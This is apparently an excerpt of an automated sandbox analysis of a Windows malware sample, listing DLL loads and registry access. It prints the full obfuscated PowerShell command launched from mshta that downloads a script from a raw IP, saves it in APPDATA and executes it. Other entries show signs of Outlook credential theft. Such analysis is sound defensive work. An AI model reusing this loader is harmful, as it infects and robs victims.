                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: pstorec.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: vaultcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wintypes.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: pstorec.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: msasn1.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                        Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.1944409134.00000000074BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1942564725.0000000006F20000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.1944409134.00000000074BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1942564725.0000000006F20000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\2qf3pwzp\2qf3pwzp.pdb source: powershell.exe, 00000003.00000002.1774693140.0000000004C3D000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.1944409134.00000000074BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1942564725.0000000006F20000.00000004.00000800.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc2ZvcmdldG1lYmFja3dpdGhnb29kbmV3c3RoaS52YlMi'+[ChaR]34+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -ex bYPasS -NOp -w 1 -c dEVICECREdentiALdEpLOYMENT ; InvokE-EXprEssioN($(Invoke-exPREssiON('[syStem.texT.enCOdiNG]'+[cHAR]0X3A+[CHar]58+'utF8.GEtsTRING([SYsTem.coNVERt]'+[ChAr]0x3A+[CHAr]0x3a+'frOMbAsE64sTrIng('+[CHAR]34+'JGJvWG5VdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1iZXJERUZJbml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT04uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBILHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLb29QLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFcVosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0aWdtLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbmdUWWpaeFVNKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJmVmYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRWdOYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRib1huVXU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjEyMy43Lzc3L3NlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGluZ3MudElGIiwiJEVOVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoZ29vZG5ld3N0aGkudmJTIiwwLDApO1N0YVJULXNsZUVQKDMpO2luVm9rRS1FWHByRVNTaU9OICAgICAgICAgICAgIC